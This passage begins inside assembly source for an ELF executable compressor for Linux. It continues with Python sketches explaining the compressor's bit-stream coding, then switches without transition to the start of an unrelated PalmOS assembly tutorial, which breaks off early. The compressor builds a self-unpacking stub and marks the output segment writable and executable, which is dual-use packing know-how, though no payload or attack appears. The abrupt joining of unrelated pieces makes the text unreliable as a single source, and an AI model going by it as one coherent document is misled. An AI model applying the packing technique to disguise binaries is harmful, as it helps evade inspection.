                                         ; EBX
         call    scanincd
         jc      new_optimalization_08_L1
         mov     ebx,dword [last_delta]
new_optimalization_08_L1:
         call    bitreq_02
         push    edx
         push    eax
         push    esi
         xchg    dword [last_delta],ebx
         push    ebx
         add     esi,eax
         call    scan002
         call    bitreq_02
         pop     ebx
         xchg    dword [last_delta],ebx
         pop     esi
         add     eax,dword [esp+0*4]
         xchg    ecx,eax
         pop     eax
         add     dword [esp+0*4],edx
         pop     edx
         cmp     dword [esp+0*4],ecx
         jc      toto_bude_asy_lepseeeee
         jnz     toto_bude_asy_horse
         cmp     dword [esp+1*4],edx
         jbe     toto_bude_asy_horse

toto_bude_asy_lepseeeee:
;       mov     dword [esp+2*4],ax
;       mov     dword [esp+3*4],bx
;       mov     dword [esp+0*4],cx
;       mov     dword [esp+1*4],dx
         add     esp, byte 4*4
         push    ebx
         push    eax
         push    edx
         push    ecx
toto_bude_asy_horse:

         dec     eax
         cmp     eax,1
         jnz     new_optimalization_08_L0

         pop     eax
         pop     eax
         pop     eax
         pop     ebx
can_t_use_new_optimalization_08:

L_NO_0:

         cmp     eax,9           ; with 32-bit opcodes this is enough for a
                                 ; 1 MB data block
                                 ; a 16-bit delta is less than 64 kB and
                                 ; requires max. 4 bytes to calculate it
                                 ; Summary: under DOS, CMP AX,4 is enough,
                                 ;   because a small value makes the
                                 ;   algorithm fast
                                 ;   Under a 32-bit OS (Linux, NT 4.0) use
                                 ;   a big value if the data block is big;
                                 ;   9 is enough for a 4 GB data block
                                 ;   Who can produce 4 GB of ASM code ???
         jnc     cant_optimize_002_L0
; i have chain with AX <2,0Fh> and try pack 1 byte AX times
         push    eax
         db      6Ah,0   ;push   0000h           ; bits require counter
         push    eax             ; pack 1 byte AX times
optimize_002_L2:
         xor     eax,eax
         call    bitreq_02       ; include procedure in bitreq02.inc
         inc     esi
         add     dword [esp+1*4],edx     ; bits require counter
         dec     dword [esp+0*4] ; pack 1 byte EAX times
         jnz     optimize_002_L2 ; simulate pack 1 byte EAX times
         pop     eax             ; remove word from stack only
         pop     ecx             ; ECX = required bits count for pack
                                 ; 1 byte EAX times
         pop     eax             ; restore EAX
         sub     esi,eax         ; restore ESI

         call    bitreq_02       ; explore once-pack EAX bytes EBX delta bits
                                 ; count
                                 ; return EDX=bits required
         cmp     edx,ecx
         jc      cant_optimize_002_L0
; use JC for prefer pack 1 byte EAX times
; use JBE for prefer once-pack EAX bytes with delta = EBX
; JC is sometimes better because pack 1 byte don't change delta and it's
; possibility pack without change delta ( call scanincd ) later
; JC has better ratio in my experiments by aprox 1 byte per 1 kB of data but
; this depend on data structure and sometimes JBE can be more rational if
; change delta and later pack with this new delta without change delta

; O.K. pack 1 byte now
pack_1_byte_look_better:
         xor     eax,eax
; now will be packed last 1 byte by call pack002 in a00.asm
; EAX=0

cant_optimize_002_L0:

         call    pack002

         add     esi,eax
         sub     dword [f0s],eax
         pushfd
         call    progress
         popfd
         jnz     near compress002        ; jnz don't handle error if packing
                                         ; more bytes as bytes in f0buffer
                                         ; jnbe is better
         mov     ecx,progress_text
         xor     edx,edx
         inc     edx
         mov     byte [ecx],0Ah
         call    WS

terminate002:

         call    putbit1
         call    putbit1

         xor     eax,eax
         stosb

         mov     ebx,dword [position]
         stc
         rcl     byte [ebx],1
         jc      done_002

flush:  shl     byte [ebx],1
         jnc     flush                   ; shift all control_bits and remove
                                         ; highest ( highest was put in
                                         ; MOV BYTE PTR DS:[DI],1 , INC DI )

done_002:

after_compress:

; modifying data for fill pointer registers in output file

; calculate boundary of moved data
         mov     ecx,f1b
         mov     eax,edi
         sub     eax,f1b - 08048000h + 1
         mov     dword [ecx+4Fh],eax     ; esi value

         mov     eax,edi
         sub     eax,f1b+4Ch+fuyi - 08048000h + 1
         add     eax,dword [ecx+40h]
         mov     dword [ecx+54h],eax     ; edi value

; calculate size of moved data
         mov     eax,edi
         sub     eax,f1b+4Ch+fuyi
         mov     dword [ecx+59h],eax     ; ecx value

; calculate offset after uncompress_routine (esi)
         mov     eax,dword [ecx+40h]
         add     eax,08048000h + uncompress_routine_end - uncompress_moved
         mov     dword [ecx+69h],eax     ; esi value

; calculate offset of moved U13 (ebp)
         sub     eax, byte (uncompress_routine_end - U13)
         mov     dword [ecx+6Eh],eax     ; ebp value

; calculate JUMP
         mov     eax,dword [ecx+18h]
         sub     eax,dword [ecx+40h]
         sub     eax,08048000h + uncompress_routine_end - uncompress_moved
         mov     dword [f1b+0D9h],eax    ;[ecx+0D9h],eax

; modify data in a header
         mov     dword [ecx+18h],0804804Ch       ; START

         mov     eax,edi
                                 ; ECX=f1b
         sub     eax,ecx         ; sub   eax,f1b
         mov     dword [ecx+3Ch],eax             ; filesize

         sub     eax, byte ( fuyi + 4Ch + 1 )
         add     dword [ecx+40h],eax             ; memorysize

         mov     byte [ecx+44h],111b             ; Exec,Write,Read

; O.K. going write output...
         mov     ebx,dword [f1h]
                         ; ECX=f1b
;;;     mov     ecx,f1b
         mov     edx,edi
         sub     edx,ecx
;       xor     eax,eax
;       mov     al,4    ; sys_write
         db      6Ah,4   ; push dword 4
         pop     eax
         int     80h
         cmp     eax,edx
         jz      OK_write
         mov     ecx,MEWF
;       xor     edx,edx
;       mov     dl,MEWFS
         db      6Ah,MEWFS       ; push dword MEWFS
         pop     edx
         call    WS
ex05:   jmp     short   exit
OK_write:

         mov     esi,f0h

         lodsd
         xchg    ebx,eax
;       xor     eax,eax
;       mov     al,6    ; sys_close
         db      6Ah,6   ; push dword 6
         pop     eax
         int     80h
         lodsd
         xchg    ebx,eax
;       xor     eax,eax
;       mov     al,6    ; sys_close
         db      6Ah,6   ; push dword 6
         pop     eax
         int     80h

exit:
         xor     ebx,ebx
;       xor     eax,eax
;       inc     eax
         db      6Ah,1
         pop     eax     ; this is better for compress as xor eax,eax inc eax
                         ; sys_exit
         int     80h

WS:     xor     ebx,ebx
         inc     ebx     ; EBX=1 (STDOUT)
;       xor     eax,eax
;       mov     al,4    ; write
         db      6Ah,4   ; push dword 4
         pop     eax
         int     80h
         ret

; -------

scan002:
; input:  chain on ESI
; return: EAX max. length ( 0 or 1 for chain not found ) , EBX delta

         push    esi
         push    edi
         xor     edx,edx         ; chain length counter
         mov     edi,f0b
         mov     ecx,esi
         sub     ecx,edi
         lodsb
scan_L00:
         jecxz   scan_L04
         repnz scasb
         jnz     scan_L04
         push    eax
         push    ecx
         push    esi
         push    edi
         mov     eax,dword [konyc_dat]
         sub     eax,esi
         mov     ecx,eax
         jecxz   scan_L03
scan_L01:
         repz cmpsb
         jnz     scan_L02
         inc     eax             ; last byte is in chain and must be
                                 ; counted
scan_L02:
         sub     eax,ecx
         cmp     eax,1           ; chain must be minimal 2 bytes long
         jbe     scan_L03
         cmp     eax,edx
         jc      scan_L03
         xchg    edx,eax
         mov     ebx,esi
         sub     ebx,edi         ; EBX=shift=delta
scan_L03:
         pop     edi
         pop     esi
         pop     ecx
         pop     eax
         jmp     short   scan_L00
scan_L04:
         pop     edi
         pop     esi
         xchg    edx,eax
         ret

; -------

scan_ncd:
; input:  chain on ESI , EAX requested length with shift = [last_delta]
; return: EAX max. length ( 0 or 1 for chain not found )
         cmp     dword [last_delta], byte 0
         jnz     mozno_aj_bude
         xor     eax,eax
         ret
mozno_aj_bude:
         push    ecx
         push    esi
         push    edi
         mov     edi,esi
         sub     edi,dword [last_delta]
         mov     ecx,eax
         repz cmpsb
         pop     edi
         pop     esi
         jnz     scan_ncd_0
         inc     eax             ; last byte is in chain and must be
                                 ; counted
scan_ncd_0:
         sub     eax,ecx
         pop     ecx
         ret


scanincd:
; input:  chain on ESI , EAX requested length with shift = [last_delta]
; return: CLC ( Carry Flag = 0 ) if chain found , STC (CF=1) if not found
         cmp     dword [last_delta], byte 0
         jnz     mozno_aj_bude_0
         stc
         ret
mozno_aj_bude_0:
         push    ecx
         push    esi
         push    edi
         mov     edi,esi
         sub     edi,dword [last_delta]
         mov     ecx,eax
         repz cmpsb
         pop     edi
         pop     esi
         jnz     nebude_any_ket_sa_zesere_z_blbych_pocytov
         jecxz   zeserau_sa_z_blbych_pocytov
nebude_any_ket_sa_zesere_z_blbych_pocytov:
         stc
         pop     ecx
         ret
zeserau_sa_z_blbych_pocytov:
         clc
         pop     ecx
         ret

; -------

scan_lim:
; input:  chain on ESI , EAX chain length , EAX > 1
; return: EBX minimal delta
; this procedure is useful to call after scan002, to scan for shorter
; chains at the same ESI
; scan_lim assumes that at ESI there is a chain with {EAX} in
; <3,max_register_limit>
; call scan_lim with EAX = {EAX}-1, {EAX}-2, {EAX}-3, ... , 3, 2
; {EAX} is the value returned by scan002
         push    ecx
         push    edi
         mov     edi,esi
scan_lim_L00:
         dec     edi
;       cmp     edi,f0b         ; call scan_lim assume that longer chain was
;                               ; found
;       jc      scan_lim_L00
         mov     ecx,eax
         push    esi
         push    edi
         repz cmpsb

         pop     edi
         pop     esi
         jnz     scan_lim_L00
         jecxz   scan_lim_L01
         jmp     short   scan_lim_L00
scan_lim_L01:
         mov     ebx,esi
         sub     ebx,edi
         pop     edi
         pop     ecx
         ret

; -------

bitreq_02:
; input  : EAX = number of bytes for pack request
;          EBX = shift = delta ( if EAX = 2 or more )
; output : EDX = number of bits required for pack
; destroy: nothing

         cmp     eax,1
         jnbe    bitreq_more_bytes

bitreq_1_byte:

         db      6Ah,7   ; push doubleword 7
         pop     edx     ; make EDX=7

; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used

; byte for compress is = 00h ?
         cmp     byte [esi],0
         jz      bitreq_7_bits   ; 7 bits required ( sequence 1100000 )

bitreq_jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
         push    eax
         mov     al,byte [esi]
         push    ecx
;       xor     ecx,ecx
;       mov     cl,15
         db      6Ah,15
         pop     ecx
         push    edi
         mov     edi,esi
         sub     edi,ecx
         cmp     edi,f0b
         jnc     bitreq_pome_skusat
         mov     edi,f0b
         mov     ecx,esi
         sub     ecx,edi
bitreq_pome_skusat:
         repnz scasb
         pop     edi
         pop     ecx
         pop     eax
         jz      bitreq_7_bits

; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
         mov     dl,9
bitreq_7_bits:
         mov     al,1            ; 1 byte packed EAX=1
         ret

bitreq_more_bytes:

         cmp     ebx,dword [last_delta]
         jnz     bitreq_another_delta

bitreq_old_delta:
         bsr     edx,eax         ; ( bits / 2 ) for calculate bytes count
         lea     edx,[2*edx+4]   ; 4 bits sequence 1000 don't calculate new
                                 ; delta
         ret

bitreq_another_delta:
         cmp     ebx,byte 7Fh                            ; cmp ebx,7Fh
                                                         ; requires 3 bytes
         jnbe    bitreq_big_delta_or_more_bytes
         cmp     eax,4
         jnc     bitreq_big_delta_or_more_bytes

; pack 2 or 3 bytes with delta <+0001h,+007Fh>
         db      6Ah,8+3
         pop     edx     ;mov    edx,8+3                 ; 8 bit = 1 byte for
                                                         ; MOV BL,[ESI]
                                                         ; INC ESI
         ret                             ; 3 bit sequence 111 switch to this
                                         ; mode

bitreq_big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
         push    eax
         push    ebx

         cmp     ebx,byte 7Fh
         jnbe    bitreq_high_delta
         dec     eax
         dec     eax             ; invert for 2x INC ECX in decompress

bitreq_high_delta:
         bsr     eax,eax         ; (bits/2)  for calculate count

         shr     ebx,8           ; remove BL part of delta
         inc     ebx
         inc     ebx
         inc     ebx             ; invert for 3x DEC EBX in decompress
         bsr     ebx,ebx         ; (bits/2) for calculate delta without BL

         add     eax,ebx
         lea     edx,[2*eax+2+8] ; 2 bit sequence for switch to this mode
                                  ; 8 bit=1 byte for MOV BL,[ESI]   INC ESI
         pop     ebx
         pop     eax
         ret

; -------

pack002:
; input :  EAX = number of bytes for pack request
;          EBX = shift = delta ( if AX = 2 or more )
; output : EAX = number of bytes packed
         cmp     eax,1
         jnbe    pack_more_bytes

pack_1_byte:

; scan if can be used 7 bits for pack 1 byte = 00h or 1 byte with shift < 16
; if this can't be used , pack by use 9 bits can be always used

; byte for compress is = 00h ?
         mov     al,byte [esi]
         or      al,al
         jz      common_7_bits   ; putbit sequence 1100000

jak_skusas_co_skusas:
; byte isn't = 00h but explore if found equal byte with shift < 16
         xor     ecx,ecx
         mov     cl,15
         push    edi
         mov     edi,esi
         sub     edi,ecx
         cmp     edi,f0b
         jnc     pome_skusat
         mov     edi,f0b
         mov     ecx,esi
         sub     ecx,edi
pome_skusat:
         repnz scasb
         pop     edi
         jnz     jerk_it_off_and_try_again
         xchg    ecx,eax
         inc     eax             ; EAX = shift (positive value)

common_7_bits:

         call    putbit1
         call    putbit1
         call    putbit0
         mov     cl,4
         shl     al,cl
pbimu7: shl     al,1
         call    putbit
         loop    pbimu7

         jmp     short   pack_1_byte_common_end

jerk_it_off_and_try_again:
; always can be used this mode but has bad pack ratio
; pack 1 byte , use 9 bits ( 1 byte + 1 bit )
         movsb
         dec     esi             ; restore ESI to ESI before pack
         call    putbit0

pack_1_byte_common_end:

         xor     eax,eax
         inc     eax             ; 1 byte packed EAX=1

         ret

pack_more_bytes:

         push    eax             ; store EAX for restore number of bytes
                                 ; packed ( by POP EAX )
         cmp     ebx,dword [last_delta]
         jnz     another_delta

pack_with_old_delta:
         call    putbit1
         call    putbit0
         call    putbit0
         call    putbit0         ; sequence 1000 don't calculate new delta

         mov     ecx,32
fdcd:   dec     ecx
         shl     eax,1
         jnc     fdcd            ; shift bits left and remove highest bit=1
                                 ; this bit will be put by INC CX in
                                 ; decompress
mocd:   shl     eax,1
         call    putbit
         dec     ecx
         jz      mwocd
         call    putbit1
         jmp     short   mocd
mwocd:  call    putbit0
         pop     eax             ; packed EAX bytes from input buffer
         ret

another_delta:
         mov     dword [last_delta],ebx  ; all modes change last_delta
;       cmp     ebx,80h                 ; cmp ebx,80h require 6 bytes
;       jnc     big_delta_or_more_bytes
         db      83h,0FBh,7Fh    ;cmp    ebx,7Fh    ; cmp ebx,7Fh requires
                                                    ; 3 bytes
         jnbe    big_delta_or_more_bytes
         cmp     eax,4
         jnc     big_delta_or_more_bytes

; pack 2 or 3 bytes with delta <+0001h,+007Fh>
         call    putbit1
         call    putbit1                 ; bit sequence 111 switch to this
                                         ; mode; third bit 1 will be passed
                                         ; at end of packing before POP AX
         sub     al,3                    ; value 2 -> CF=1, value 3 -> CF=0
         adc     bl,bl
         xchg    ebx,eax
         stosb
         call    putbit1                 ; put last control bit must be after
                                         ; STOSB (for mov bl,[esi] , inc esi)
                                         ; because when decompress , bits are
                                         ; processed first and byte second ->
                                         ; when compressing , byte must be
                                         ; processed before last bit
         pop     eax                     ; value 2 or 3
                                         ;     -> this mode process 2 or 3
                                         ;        bytes
         ret

big_delta_or_more_bytes:
; pack 4 or more bytes with delta <+0001h,maximal_delta)
; pack 2 or more bytes with delta <+0080h,maximal_delta)
         call    putbit1
         call    putbit0

         db      83h,0FBh,7Fh    ;cmp    ebx,7Fh
         jnbe    high_delta
         dec     eax
         dec     eax                     ; invert for 2x INC ECX in
                                         ; decompress
high_delta:

         push    eax
         xchg    ebx,eax
         push    eax             ; push only for part in BL moved to AL
         shr     eax,8           ; this destroy AL
         inc     eax
         inc     eax
         inc     eax             ; invert for 3x DEC EBX

         mov     ecx,32
fgfaad: dec     ecx
         shl     eax,1
         jnc     fgfaad

wetryw: shl     eax,1
         call    putbit
         dec     ecx
         jz      shsdwd
         call    putbit1
         jmp     short   wetryw
shsdwd: call    putbit0
         pop     ebx             ; pop only for BL
         pop     eax             ; pop bytes count

calculate_count:
         mov     ecx,32
fcdcd:  dec     ecx
         shl     eax,1
         jnc     fcdcd           ; shift all bits left and remove highest
                                 ; bit=1
                                 ; this bit will be put by INC ECX in
                                 ; decompress
mwocdl: shl     eax,1
         call    putbit
         dec     ecx
         jz      mwocdt
         call    putbit1
         jmp     short   mwocdl
mwocdt:
         xchg    ebx,eax
         stosb                   ; store AL (BL in decompress)
                                 ; as well in delta <+0001h,+007Fh> , stored
                                 ; byte must be before store last bit because
                                 ; when decompress, bit will be processed
                                 ; first and byte will be loaded later

         call    putbit0         ; this bit will be processed in
                                 ; decompress for calculate ECX ( JC U05 )

         pop     eax             ; packed EAX bytes from input buffer
         ret

; -------

; putbit input  :  Carry Flag (CF=0,CF=1)
;        output :  bit 0. in [position], EDI+1 as need for store bit to
;                  [EDI]
;        destroy:  nothing

putbit0:clc                             ; put bit=0
         jmp     short putbit
putbit1:stc                             ; put bit=1
putbit: push    ebx
         mov     ebx,dword [position]
         rcl     byte [ebx],1
         pop     ebx
         jnc     o_C_1
o_C_0:  mov     byte [edi],1
         mov     dword [position],edi
         inc     edi
o_C_1:  ret

; -------

progress:
         pushad
         mov     esi,f0s_2
         mov     edi,progress_text+1
         mov     ebp,w1hch

         lodsd
         push    eax
         sub     eax,dword [esi]

         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp

         inc     edi
         inc     edi
         pop     eax

         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp
         rol     eax,4
         call    ebp

         mov     ecx,progress_text
         xor     edx,edx
         mov     dl,progress_text_size
         call    WS
         popad
         ret

w1hch:  push    eax
         and     al,00001111b
         cmp     al,10
         sbb     al,69h
         das
         stosb
         pop     eax
         ret

; -------

uncompress_routine:
         pushfd
         pushad
         mov     esi,0
         mov     edi,0
         mov     ecx,0
         std
         repz movsb
         cld
         xchg    esi,edi
         inc     esi
         db      83h,0EFh,fuyi - 1       ; sub edi,fuyi-1
         push    esi
         mov     esi,0
         mov     ebp,0           ; U13
         mov     dl,80h
         ret

fuyi    equ     $ - uncompress_routine

uncompress_moved:
         push    eax

U00:    movsb
U01:    call    ebp
         jnc     U00

         xor     ebx,ebx
         call    ebp
         inc     ecx
         jnc     U03

         call    ebp
         jc      U06

         mov     bl,10h
U02:    call    ebp
         adc     bl,bl
         jnc     U02

         jnz     U10

         xchg    ebx,eax
         jmp     short U12

U03:    inc     ebx
U04:    call    ebp
         adc     ebx,ebx
         call    ebp
         jc      U04

U05:    call    ebp
         adc     ecx,ecx
         call    ebp
         jc      short U05

         dec     ebx
         dec     ebx
         jz      short U09
         dec     ebx
         shl     ebx,8
;;;;;;; clc             ; clc isn't needed because EBX < 01000000h before
                        ; shift

U06:    mov     bl,byte [esi]
         inc     esi
         jnc     U07

         shr     bl,1
         jz      U15
         sbb     cl,ch           ; equ SBB CL,BH because BH=CH=0

U07:    ;cmp    ebx,00007D00h   ; this is not implemented, yet
         ;jnc    zvys_o_dve      ; i found this in WINCMD32.EXE v. 4.03
         ;cmp    ebx,00000500h   ; packed with ASPACK
         ;jnc    zvys_o_jennu
                 ; isn't rational compress 3 bytes with shift > 7CFFh
                 ; rational is at least 4 bytes
                 ; isn't rational compress 2 bytes with shift > 4FFh
                 ; rational is at least 3 bytes
         cmp     ebx, byte 7Fh   ;db     83h,0FBh,7Fh
         jnbe    U08

zvys_o_dve:
         inc     ecx
zvys_o_jennu:
         inc     ecx

U08:    pop     eax
         db      0A8h            ; opcodes A8 5B = TEST AL,5B
U09:    pop     ebx             ; opcode 5B
         push    ebx
U10:    neg     ebx

U11:    mov     al,byte [edi+ebx]
U12:    stosb
         loop    U11
         jmp     short U01

U13:    add     dl,dl           ; get highest bit from control_byte
         jnz     U14    ; is it last non-zero bit ? = all 8 bits was
                        ; processed ?
         lodsb                   ; load control_byte
         xchg    edx,eax         ; store control_byte to DL
         adc     dl,dl           ; put last bit from last control_byte to
                                 ; bit 0. of new control_byte
U14:    ret

U15:    pop     eax
         popad
         popfd
         db      0E9h            ; jump
         dd      0

uncompress_routine_end:
uncompress_routine_size equ     $ - uncompress_routine

; -------

MEOF            db      'ERROR OPEN file!',0Ah
MEOFS           equ     $ - MEOF
MECF            db      'ERROR CREAT file!',0Ah
MECFS           equ     $ - MECF
MSEEF           db      'ERROR SEEK to END of file!',0Ah
MSEEFS          equ     $ - MSEEF
MSEBF           db      'ERROR SEEK to BEGIN of file!',0Ah
MSEBFS          equ     $ - MSEBF
MERF            db      'ERROR READ file!',0Ah
MERFS           equ     $ - MERF
MEWF            db      'ERROR WRITE file!',0Ah
MEWFS           equ     $ - MEWF
usage           db      0Ah,'K0mprezz ELF ASM executab1e fy1e usyng OOO '
                 db      'alg0rythm',0Ah
                 db      0Ah,'usage: a00 '
                 db      'filename_for_compress compressed_filename',0Ah,0Ah
                 db      'ASM coding in LINUX by Feryno',0Ah
                 db      'Feryno: ASSEMBLER-only and DISASSEMBLER-only '
                 db      'wonderful'
                 db      0Ah,0Ah
usagesize       equ     $ - usage
progress_text   db      0Dh,'00000000h/00000000h'
progress_text_size      equ     $ - progress_text

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                 ;;
filesize        equ     $ - $$  ;;
                                 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

SECTION .bss
ALIGNB 4

f0h             resd    1       ; in_file handle
f1h             resd    1       ; out_file handle
f0s_2           resd    1       ; in_file size
f0s             resd    1       ; in_file size
position        resd    1       ; required by putbit procedures
konyc_dat       resd    1
last_delta      resd    1

fy1eObuffer     resb    4Ch             ; header of a file
f0b             resb    100000h         ; kode & data of a fy1e
f0b_size        equ     $ - fy1eObuffer

f1b_size        equ     200000h
f1b             resb    f1b_size


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                 ;;
bsssize         equ     $ - $$  ;;
                                 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                 ;;
memsize         equ     filesize+bsssize        ;;
                                                 ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
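
The putbit procedure and the U13 routine in the listing above share one
trick: every control byte carries a marker bit, so neither side needs a
separate bit counter. The Python sketch below models only that mechanism;
it is not a port of a00.asm. The class and method names are invented for
this illustration, and it assumes that the stream opens with a control byte.

```python
class BitWriter:
    """Toy model of putbit: control bits and literal bytes share one stream."""

    def __init__(self):
        self.out = bytearray([1])   # assumption: stream opens with a control byte
        self.pos = 0                # index of the control byte being filled

    def put_bit(self, bit):
        value = (self.out[self.pos] << 1) | (bit & 1)   # rcl byte [position],1
        self.out[self.pos] = value & 0xFF
        if value & 0x100:           # the marker fell out: this byte is full
            self.out.append(1)      # mov byte [edi],1 : fresh marker
            self.pos = len(self.out) - 1

    def put_byte(self, byte):
        self.out.append(byte & 0xFF)                    # stosb / movsb

    def flush(self):
        value = (self.out[self.pos] << 1) | 1           # stc / rcl
        while not value & 0x100:                        # shl until marker leaves
            value <<= 1
        self.out[self.pos] = value & 0xFF


class BitReader:
    """Toy model of U13: DL holds the control bits plus a marker."""

    def __init__(self, data):
        self.data = bytes(data)
        self.i = 0
        self.dl = 0x80              # mov dl,80h : nothing but the marker

    def get_bit(self):
        value = self.dl << 1                            # add dl,dl
        carry, self.dl = value >> 8, value & 0xFF
        if self.dl == 0:            # only the marker was left: reload
            value = (self.data[self.i] << 1) | carry    # lodsb / adc dl,dl
            self.i += 1
            carry, self.dl = value >> 8, value & 0xFF
        return carry

    def get_byte(self):
        byte = self.data[self.i]                        # mov bl,[esi] / inc esi
        self.i += 1
        return byte


def pack_literals(data):
    writer = BitWriter()
    for byte in data:
        writer.put_byte(byte)       # the byte goes out first ...
        writer.put_bit(0)           # ... its control bit second
    writer.flush()
    return bytes(writer.out)


def unpack_literals(stream, count):
    reader = BitReader(stream)
    result = bytearray()
    for _ in range(count):
        assert reader.get_bit() == 0    # the bit is read first ...
        result.append(reader.get_byte())  # ... the byte second
    return bytes(result)
```

Note the order in the two helper functions: the packer stores the literal
byte first and its control bit second, while the unpacker reads the bit
first and the byte second. That mirrors the comments in pack002 ("byte must
be processed before last bit") and keeps both sides in step when a control
byte fills up between the two operations.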

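The loops at fdcd/mocd in pack002 (and their twins fcdcd/mwocdl) store a
count without its highest 1 bit and follow every remaining data bit with a
"more bits follow" flag. That is why bitreq_old_delta charges 2*BSR(EAX)
bits on top of the 4-bit prefix 1000. A sketch of that code in Python
follows; the function names are assumptions of this example, not names from
the listing.

```python
def encode_count(n):
    """Return the bits stored for a count n >= 2 (the top 1 bit is implied)."""
    bits = []
    top = n.bit_length() - 1            # the value BSR would return
    for i in range(top - 1, -1, -1):
        bits.append((n >> i) & 1)       # data bit (shl eax,1 / call putbit)
        bits.append(1 if i else 0)      # 1 = more bits follow, 0 = last one
    return bits


def decode_count(bits):
    """Inverse of encode_count, in the style of the U05 loop."""
    it = iter(bits)
    n = 1                               # the implied top bit (inc ecx)
    while True:
        n = (n << 1) | next(it)         # call ebp / adc ecx,ecx
        if next(it) == 0:               # call ebp / jc U05
            return n


def cost_old_delta(n):
    """Bits needed to repeat the last delta for n bytes: prefix 1000 + count."""
    return 4 + len(encode_count(n))
```

For example, encode_count(5) gives the four bits 0,1,1,0: 5 is 101 in
binary, the leading 1 is dropped, and each of the two remaining bits is
followed by its flag.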

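The w1hch routine turns a nibble into its ASCII hex digit with the classic
CMP / SBB / DAS sequence, and progress calls it after every ROL EAX,4 to
print eight digits. The Python model below follows the flags by hand to
show why this works. It is a simplified sketch: only CF and AF are
tracked, and the function names are made up for the example.

```python
def nibble_to_hex(al):
    """Model of: and al,0Fh / cmp al,10 / sbb al,69h / das."""
    al &= 0x0F                                  # and al,00001111b
    cf = 1 if al < 10 else 0                    # cmp al,10 : CF=1 when al < 10
    af = 1 if (al & 0x0F) < 9 + cf else 0       # sbb borrows out of the low nibble?
    al = (al - 0x69 - cf) & 0xFF                # sbb al,69h
    cf = 1                                      # al <= 15 < 69h, so sbb always borrows
    old_al = al                                 # das: decimal adjust after subtraction
    if (al & 0x0F) > 9 or af:
        al = (al - 6) & 0xFF
    if old_al > 0x99 or cf:
        al = (al - 0x60) & 0xFF
    return chr(al)


def hex32(value):
    """Eight hex digits, most significant first, as the progress routine prints."""
    digits = []
    for _ in range(8):
        value = ((value << 4) | (value >> 28)) & 0xFFFFFFFF   # rol eax,4
        digits.append(nibble_to_hex(value))
    return "".join(digits)
```

For the digits 0 to 9 both adjustments of DAS fire (minus 6, then minus
60h) and the result lands in 30h to 39h; for 10 to 15 only the second one
fires and the result lands in 41h to 46h.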

::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::........................................PALMOS.ENVIRONMENT
                                                                Hello Tiny World
                                                                by Latigo


Hola! This is a tutorial on assembler for the PalmOS environment. I decided
to write it due to the lack of material on the web. To assemble the code
presented in this paper, you need Darrin Massena's ASDK, which can be
downloaded from http://www.massena.com/darrin/pilot/index.html. The ASDK
contains an assembler, a disassembler, the Palm emulator and many other
great tools. Massena is the low-level-semi-god-techno-guru who created the
assembler (Pila), along with many other tools and documents. He was my
starting point (and that of many others) for asm coding in the Palm
environment.

The Palm uses a variation of the Motorola 68K CPU called 'DragonBall', which
has eight 32-bit Data registers (D0 to D7), eight Address registers (A0 to
A7, with A7 being the stack pointer), a PC register (the 'Program Counter',
which contains the address of the next instruction to be executed) and a
16-bit register called the Status Register (SR). Another thing to note is
the way operands are specified in the DragonBall environment. It's not
'DEST,SRC' as in the Wintel world we all know, but 'SRC,DEST'. Say you
wanted to copy the entire contents of the D7 register to D0; this is how it
is done: 'MOVE.L D7,D0'.

One last very important thing is how to specify data sizes. In the previous
example I used 'MOVE.L', where '.L' stands for a 'long' (32-bit) operand. I
could have used '.b' or '.w', meaning byte and word respectively. The size
is always appended, when applicable, to the instruction mnemonic. What I'm
going to show you here is pretty basic, but it will be enough as a start:
the typical 'Hello World'.
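
To make the SRC,DEST order and the size suffixes concrete, here is a toy
Python model of a MOVE between two data registers. It is only a sketch, not
an emulator: the function name and the sample values are made up, and it
covers data registers only, where a byte or word move leaves the upper bits
of the destination untouched.

```python
# Bits of the destination that each size suffix replaces.
SIZE_MASK = {"b": 0xFF, "w": 0xFFFF, "l": 0xFFFFFFFF}


def move(size, src, dest):
    """Return the new destination value after MOVE.<size> src,dest."""
    mask = SIZE_MASK[size.lower()]
    kept = dest & ~mask & 0xFFFFFFFF    # destination bits outside the operand
    return kept | (src & mask)          # source bits inside the operand


d7 = 0x11223344
d0 = 0xAABBCCDD

print(hex(move("l", d7, d0)))   # MOVE.L D7,D0 -> 0x11223344
print(hex(move("w", d7, d0)))   # MOVE.W D7,D0 -> 0xaabb3344
print(hex(move("b", d7, d0)))   # MOVE.B D7,D0 -> 0xaabbcc44
```

The source comes first and the destination second, exactly the reverse of
the Intel 'MOV dest,src' habit.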


Theory:
-------
We will create a basic Palm program in assembly which will make use of the
FrmAlert Systrap in order to display an Alert Resource.

Word FrmAlert (
         Word alertId
);

As you can see, this Systrap (the word Systrap can be taken as a synonym of
'API') takes one parameter: the ID of an Alert resource. There are many
resource types (String, Form, version, etc.) but we only care about the
'Alert' type. All this means that we must create a resource file (.rcp)
which includes our Alert, and the asm file (.asm) which contains the code to
display the Alert resource.

All this said, let's do some 'Hello tiny world' :)


The resource file (Hello.rcp):
------------------------------

; Here we are going to declare our resources. In this case only an Alert
